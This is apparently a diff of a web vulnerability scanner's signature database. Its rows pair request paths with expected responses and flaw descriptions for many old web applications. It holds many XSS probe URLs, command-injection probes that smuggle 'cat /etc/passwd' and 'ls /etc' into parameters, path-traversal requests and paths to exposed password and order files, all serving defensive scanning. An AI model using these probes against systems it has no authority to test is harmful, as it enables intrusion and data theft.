"000901","0","4","/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview","GET","<script>alert ('Vulnerable')</script>","","","","","This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""923 "000902","50619","4","/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>","GET","<script>alert (1)</script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.","",""924 "000903","50619","4","/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"","GET","<script>alert (1)</script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.","",""925 "000904","0","4","/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert (\"Vulnerable\")</script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""926 "000905","651","4","/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""927 "000906","651","4","/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""928 "000907","42015","4","/cgi-bin/test2.pl?<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Default Monkey server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""929 "000908","2257","4","/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E","GET","alert (\"alert\")","","","","","Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""930 "000909","7022","4","/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05","GET","<script>alert (document.cookie);</script>","","","","","DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""931 "000910","27096","4","/ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""932 "000911","27097","4","/ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","GET","<script>alert ('Vulnerable')</script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""933 "000912","27095","4","/bb000001.pl<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""934 "000913","3850","4","/article.php?sid=\"><Img Src=javascript:alert('Vulnerable')><Img Src=\"","GET","<script>alert ('Vulnerable')</script>","","","","","phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""935 "000914","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie);</script>","","","","","With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""936 "000915","4765","4","/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""907 "000886","2322","4","/gallery/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","","" 908 "000887","20234","4","/friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","","" 909 "000888","2946","4","/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22","GET","alert\('Vulnerable'\)","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 910 "000889","2739","4","/forums/index.php?top_message=<script>alert(document.cookie)</script> ","GET","<script>alert\(document\.cookie\)<script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 911 "000890","31694","4","/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02.","","" 912 "000891","5043","4","/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","php(Reactor) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 913 "000892","2530","4","/esp?PAGE=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 914 "000893","9231","4","/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02.","","" 915 "000894","59095","4","/downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 916 "000895","59095","4","/downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 917 "000896","59095","4","/downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 918 "000897","0","4","/download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","","" 919 "000898","0","4","/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window\.alert\(document\.cookie\);<\/script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 920 "000899","0","4","/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window\.alert\(document\.cookie\);<\/script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 921 "000900","5043","4","/comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 922 "000901","0","4","/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","","" 923 "000902","50619","4","/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>","GET","<script>alert\(1\)<\/script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.","","" 924 "000903","50619","4","/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"","GET","<script>alert\(1\)<\/script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.","","" 925 "000904","0","4","/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 926 "000905","651","4","/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 927 "000906","651","4","/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 928 "000907","42015","4","/cgi-bin/test2.pl?<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Default Monkey server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 929 "000908","2257","4","/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E","GET","alert\(\"alert\"\)","","","","","Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 930 "000909","7022","4","/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05","GET","<script>alert\(document\.cookie\);<\/script>","","","","","DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 931 "000910","27096","4","/ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 932 "000911","27097","4","/ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 933 "000912","27095","4","/bb000001.pl<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 934 "000913","3850","4","/article.php?sid=\"><Img Src=javascript:alert('Vulnerable')><Img Src=\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 935 "000914","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 936 "000915","4765","4","/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 937 937 "000916","0","4","/anthill/login.php","GET","200","","","","","Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02","","" 938 "000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""939 "000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""940 "000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""941 "000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," ",""942 "000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","",""943 "000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","",""944 "000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert (document.cookie)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""945 "000924","0","4","/<script>alert('Vulnerable')</script>.thtml","GET","<script>alert ('Vulnerable')</script>.thtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""946 "000925","0","4","/<script>alert('Vulnerable')</script>.shtml","GET","<script>alert ('Vulnerable')</script>.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""947 "000926","0","4","/<script>alert('Vulnerable')</script>.jsp","GET","<script>alert ('Vulnerable')</script>.jsp","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""948 "000927","0","4","/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert ('Vulnerable')</script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.","",""949 "000928","59443","4","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""950 "000929","59442","4","//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""951 "000930","0","4","/<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) with HTML-encoded requests. CA-2000-02.","",""952 "000931","0","4","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","GET","<script>alert ('Vulnerable')</script>","","","","","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.","",""953 "000932","0","4","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert ('Vulnerable')</script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","",""954 "000933","0","4","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert ('Vulnerable')</script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","",""955 "000934","0","4","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert ('Vulnerable')</script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","",""956 "000935","9209","4","/%0a%0a<script>alert(\"Vulnerable\")</script>.jsp","GET","<script>alert (\"Vulnerable\")</script>","","","","","Jetty JSP servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""938 "000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 939 "000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 940 "000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 941 "000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," ","" 942 "000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","","" 943 "000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","","" 944 "000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 945 "000924","0","4","/<script>alert('Vulnerable')</script>.thtml","GET","<script>alert\('Vulnerable'\)<\/script>\.thtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 946 "000925","0","4","/<script>alert('Vulnerable')</script>.shtml","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 947 "000926","0","4","/<script>alert('Vulnerable')</script>.jsp","GET","<script>alert\('Vulnerable'\)<\/script>\.jsp","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 948 "000927","0","4","/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.","","" 949 "000928","59443","4","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","","" 950 "000929","59442","4","//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","","" 951 "000930","0","4","/<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) with HTML-encoded requests. CA-2000-02.","","" 952 "000931","0","4","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.","","" 953 "000932","0","4","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","","" 954 "000933","0","4","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","","" 955 "000934","0","4","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","","" 956 "000935","9209","4","/%0a%0a<script>alert(\"Vulnerable\")</script>.jsp","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Jetty JSP servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 957 957 "000936","19772","4","@CGIDIRStitle.cgi","GET","200","","","","","HNS's title.cgi is vulnerable to Cross Site Scripting (XSS CA-2000-02) in version 2.00 and earlier, and Lite 0.8 and earlier.","","" 958 958 "000937","21365","34","@CGIDIRScompatible.cgi","GET","200","","","","","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 959 "000938","0","34","/add_user.php","GET","output started at /","","","","","DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""959 "000938","0","34","/add_user.php","GET","output started at \/","","","","","DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 960 960 "000939","0","1","@CGIDIRSprobecontrol.cgi?command=enable&username=cancer&password=killer","GET","200","","","","","This might be interesting... has been seen in web logs from a scanner.","","" 961 961 "000940","0","1","@CGIDIRSretrieve_password.pl","GET","200","","","","","May not be vulnerable, but see http://www.dcscripts.com/bugtrac/DCForumID7/3.html for information.","","" … … 980 980 "000959","0","2","@CGIDIRSmt/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","","" 981 981 "000960","0","2","@CGIDIRSmt/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" 982 "000961","143","2","/cgi-bin-sdb/printenv","GET"," /usr/bin/perl","","","","","SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431.","",""982 "000961","143","2","/cgi-bin-sdb/printenv","GET","\/usr\/bin\/perl","","","","","SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431.","","" 983 983 "000962","0","12","/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C","GET","200","","","","","This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm","","" 984 984 "000963","59412","23","/db/users.dat","GET","200","","","","","upb PB allows the user database to be retrieved remotely.","","" … … 992 992 "000971","596","3","@CGIDIRSDCShop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" 993 993 "000972","0","3","@CGIDIRSdumpenv.pl","GET","200","","","","","This CGI gives a lot of information to attackers.","","" 994 "000973","89","3","@CGIDIRShtsearch?-c/nonexistant","GET","Unable to read configuration file ' /nonexistant'","","","","","The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.","",""994 "000973","89","3","@CGIDIRShtsearch?-c/nonexistant","GET","Unable to read configuration file '\/nonexistant'","","","","","The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.","","" 995 995 "000974","0","3","@CGIDIRSmkilog.exe","GET","200","","","","","This CGI can give an attacker a lot of information.","","" 996 996 "000975","0","3","@CGIDIRSmkplog.exe","GET","200","","","","","This CGI can give an attacker a lot of information.","","" … … 1014 1014 "000993","59645","3","/chat/!pwds.txt","GET","200","","","","","WF-Chat 1.0 Beta allows retrieval of user information.","","" 1015 1015 "000994","53304","3","/chat/data/usr","GET","200","","","","","SimpleChat! 1.3 allows retrieval of user information.","","" 1016 "000995","0","3","/com","GET"," index of ","","","","","Java class files may be browsable.","",""1017 "000996","0","3","/COM","GET"," index of ","","","","","Java class files may be browsable.","",""1016 "000995","0","3","/com","GET","[Ii]ndex [Oo]f ","","","","","Java class files may be browsable.","","" 1017 "000996","0","3","/COM","GET","[Ii]ndex [Oo]f ","","","","","Java class files may be browsable.","","" 1018 1018 "000997","0","3","/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" 1019 1019 "000998","0","3","/config/","GET","200","","","","","Configuration information may be available remotely.","","" … … 1035 1035 "001014","0","7","@CGIDIRSicat","GET","200","","","","","Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.","","" 1036 1036 "001015","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","Failed to read the maskfile","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" 1037 "001016","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4 .0","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""1038 "001017","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4 .1","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""1039 "001018","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4 .2","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""1040 "001019","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4 .3","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""1037 "001016","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.0","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" 1038 "001017","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.1","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" 1039 "001018","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.2","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" 1040 "001019","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.3","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" 1041 1041 "001020","0","7","@CGIDIRSnph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0","GET","200","","","","","nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug","","" 1042 1042 "001021","0","7","@CGIDIRSquery?mss=%2e%2e/config","GET","MGMT_PW","","","","","The Altavista search service allows attackers to read any file on the server.","","" 1043 "001022","0","7","@CGIDIRStest-cgi?/*","GET"," /tmp","","","","","This CGI allows files to read remotely.","",""1043 "001022","0","7","@CGIDIRStest-cgi?/*","GET","\/tmp","","","","","This CGI allows files to read remotely.","","" 1044 1044 "001023","6192","7","@CGIDIRSupdate.dpgs","GET","200","","","","","Duma Photo Gallery System may allow remote users to write to any file on the system. See http://b0iler.eyeonsecurity.net for details. This could not be remotely tested.","","" 1045 1045 "001024","0","7","@CGIDIRSview-source","GET","200","","","","","This may allow remote arbitrary file retrieval.","","" … … 1053 1053 "001032","650","8","@CGIDIRScgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","CGIEmail's cgicso allows attackers to execute remote commands.","","" 1054 1054 "001033","0","8","@CGIDIRScgiwrap","GET","200","","","","","Some versions of cgiwrap allow anyone to execute commands remotely."," ","" 1055 "001034","640","8","@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","GET","resolv .conf","","","","","Allows attacker to execute commands as http daemon. Upgrade or remove.","",""1055 "001034","640","8","@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","GET","resolv\.conf","","","","","Allows attacker to execute commands as http daemon. Upgrade or remove.","","" 1056 1056 "001035","0","8","@CGIDIRSCount.cgi","GET","200","","","","","This may allow attackers to execute arbitrary commands on the server","","" 1057 1057 "001036","59544","8","@CGIDIRScsChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","","" … … 1091 1091 "001070","0","8","/cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download","GET","root:","","","","","Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands","","" 1092 1092 "001071","235","8","/cgi-bin/webdist.cgi","GET","200","","","","","Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands","","" 1093 "001072","14485","8","/DB4Web/10.10.10.10:100","GET","connect ()","","","","","The remote DB4Web server may allow you to connect to arbitrary machines and ports.","",""1093 "001072","14485","8","/DB4Web/10.10.10.10:100","GET","connect\(\)","","","","","The remote DB4Web server may allow you to connect to arbitrary machines and ports.","","" 1094 1094 "001073","55","8","/ews/ews/architext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665.","","" 1095 1095 "001074","0","8","/exec/show/config/cr","GET","ip address","","","","","The Cisco router's web install allows arbitrary commands to be executed remotely.","","" … … 1099 1099 "001078","28","a","@CGIDIRScachemgr.cgi","GET","200","","","","","Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.","","" 1100 1100 "001079","142","a","@CGIDIRSppdscgi.exe","GET","200","","","","","PowerPlay Web Edition may allow unauthenticated users to view pages.","","" 1101 "001080","0","a","@CGIDIRSsws/admin.html","GET","manager .pl","","","","","Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication.","",""1101 "001080","0","a","@CGIDIRSsws/admin.html","GET","manager\.pl","","","","","Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication.","","" 1102 1102 "001081","0","a","@CGIDIRSwebif.cgi","GET","200","","","","","HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.","","" 1103 1103 "001082","29786","a","/admin.php?en_log_id=0&action=config","GET","200","","","","","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.","","" … … 1108 1108 "001087","0","a","/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi","GET","200","","","","","Older versions of this CGI allow any user to change the administrator password.","","" 1109 1109 